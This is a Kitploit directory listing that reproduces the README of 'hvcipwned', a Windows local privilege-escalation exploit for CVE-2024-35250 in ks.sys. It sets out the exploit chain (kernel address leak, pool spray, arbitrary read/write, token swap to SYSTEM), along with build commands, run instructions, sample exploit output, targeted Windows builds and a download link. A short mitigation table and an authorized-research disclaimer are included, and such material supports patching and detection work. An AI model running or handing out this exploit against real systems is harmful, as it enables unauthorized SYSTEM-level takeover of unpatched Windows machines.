Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
HVCIPwned — CVE-2024-35250 demonstrates that HVCI is not a defense against data-only kernel exploits. As long as a driver bug provides an arbitrary R/W primitive, token swap remains a universal SYSTEM elevation technique — no code execution required. | Kitploit
Tools/GitHubGitHub/xvalegendary/hvcipwned
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubxvalegendary/hvcipwned

HVCIPwned

CVE-2024-35250 demonstrates that HVCI is not a defense against data-only kernel exploits. As long as a driver bug provides an arbitrary R/W primitive, token swap remains a universal SYSTEM elevation technique — no code execution required.

View Repository
886 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-35250

Local privilege escalation via untrusted pointer dereference in Windows Kernel Streaming driver (ks.sys). Data-only exploit — bypasses Hypervisor-protected Code Integrity (HVCI).

Summary

FieldDetail
CVECVE-2024-35250
Componentks.sys (Kernel Streaming)
Bug ClassUntrusted Pointer Dereference
ImpactEoP to NT AUTHORITY\SYSTEM
HVCIBypassed — no code execution in kernel
PatchKB5039212 (June 2024)
TargetsWindows 10 20H1+ / Windows 11 21H2-23H2

Vulnerability

ks!KspPropertyHandler dispatches topology-level property requests through KspProcessPropertyNode. The NodeId field from user-supplied KSP_NODE structure is used as an index into an internal automation table array without bounds validation:

NtDeviceIoControlFile
  ks!CKSFilter::DispatchDeviceIoControl
    ks!KspPropertyHandler
      ks!KspProcessPropertyNode
        *(automationTable + NodeId * stride)   <-- attacker-controlled

A crafted NodeId exceeding the actual node count redirects the dereference to adjacent pool memory, yielding an out-of-bounds read/write primitive.

HVCI Bypass

The exploit manipulates kernel data structures exclusively:

  1. Leak EPROCESS address via NtQuerySystemInformation
  2. Trigger the vulnerability to build arbitrary kernel R/W
  3. Walk ActiveProcessLinks to locate PID 4 (System)
  4. Overwrite current process token with System token
  5. Spawn elevated shell

No shellcode is injected. No unsigned code pages are created or executed. No control-flow pointers are hijacked.

ProtectionStatus
HVCI / KMCIBypassed
SMEPNot triggered
SMAPNot triggered
kCFGNot triggered
CET / Shadow StackNot triggered

Build

Requirements

  • Visual Studio 2019 / 2022
  • Windows SDK 10.0.19041.0+

Compile

  1. Open hvcipwned.sln in Visual Studio
  2. Select Release | x64
  3. Build → Build Solution (Ctrl+Shift+B)

Output binary: x64\Release\hvcipwned.exe

Manual cl.exe build

cl.exe /nologo /W4 /O2 /TC ^
    main.c device.c leak.c krw.c token.c exploit.c ^
    /I ^
    /Fe:exploit.exe ^
    /link setupapi.lib kernel32.lib advapi32.lib

Usage

hvcipwned.exe

Run from an unprivileged user session on a vulnerable (unpatched) system. On success a new cmd.exe window opens running as NT AUTHORITY\SYSTEM.

Expected output

[+] cve-2024-35250 exploit
[+] ks.sys untrusted pointer dereference -> eop
[~] hvci bypass via data-only attack
[+] os: 10.0.19045
[+] offsets: pid=0x440 links=0x448 token=0x4b8
[+] device: \\?\hdaudio#func_01&ven_10ec...
[+] device handle: 0x00000000000000f4
[~] calibrating r/w primitive...
[+] kernel base: 0xfffff80140000000
[~] spraying named pipes for pool layout...
[+] sprayed 5000 pipe pairs
[~] poking hole at index 2500...
[~] scanning for kernel pointer via oob read...
[+] found kernel ptr at node 3 offset 2: 0xffffa70500000000
[+] pipe object kernel addr: 0xffffa70500000000
[+] r/w primitive initialized (mode 1)
[+] current eprocess: 0xffffa705d90f4080
[+] kernel read pid: 1234 (expected: 1234)
[+] system eprocess: 0xffffa70500004080
[+] system token: 0xffffa70512345673
[+] token after swap: 0xffffa70512345670
[+] token swap successful
[+] escalation complete
[+] elevated shell spawned (pid: 5678)

press enter to exit...

Project Structure

hvcipwned/
├── hvcipwned.sln
├── hvcipwned.vcxproj
├── hvcipwned.vcxproj.filters
├── README.md
├── LICENSE
├── .gitignore
├── common.h         - types, log macros, nt api typedefs
├── offsets.h        - per-build eprocess field offsets
├── device.h         - ks device enumeration
├── leak.h           - kernel address leaks
├── krw.h            - r/w primitive context
├── token.h          - token swap + shell spawn
└── exploit.h        - top-level entry
├── main.c           - entry point
├── device.c         - setupapi device open
├── leak.c           - NtQuerySystemInformation leaks
├── krw.c            - vulnerability trigger + pool spray + r/w
├── token.c          - eprocess walk + token overwrite
└── exploit.c        - orchestration

Supported Builds

OSBuildStatus
Windows 10 20H119041Supported
Windows 10 20H219042Supported
Windows 10 21H119043Supported
Windows 10 21H219044Supported
Windows 10 22H219045Supported
Windows 11 21H222000Supported
Windows 11 22H222621Supported
Windows 11 23H222631Supported

Offsets are resolved automatically at runtime via RtlGetVersion.

Notes

  • Requires a KS filter device with topology nodes (audio devices work)
  • Pool spray success depends on system memory pressure and timing
  • The exploit uses named pipe attributes for pool feng shui
  • Run as a regular (non-admin) user to demonstrate privilege escalation
  • May require multiple attempts due to pool layout randomization

Mitigation

ActionDetail
PatchInstall KB5039212 (June 2024) or later
DetectionMonitor IOCTL_KS_PROPERTY with KSPROPERTY_TYPE_TOPOLOGY flag
EDRAlert on token integrity changes via EtwTi kernel callbacks
HardeningRestrict user access to KS device interfaces via DACL

References

  • Microsoft Advisory
  • KB5039212 Patch Notes
  • DEVCORE — Pwn2Own Vancouver 2024
  • varwara/CVE-2024-35250

Disclaimer

This project is provided for authorized security research and educational purposes only. Do not use against systems without explicit written permission. The author assumes no liability for any misuse or damage caused by this software.

License

MIT

Download Tool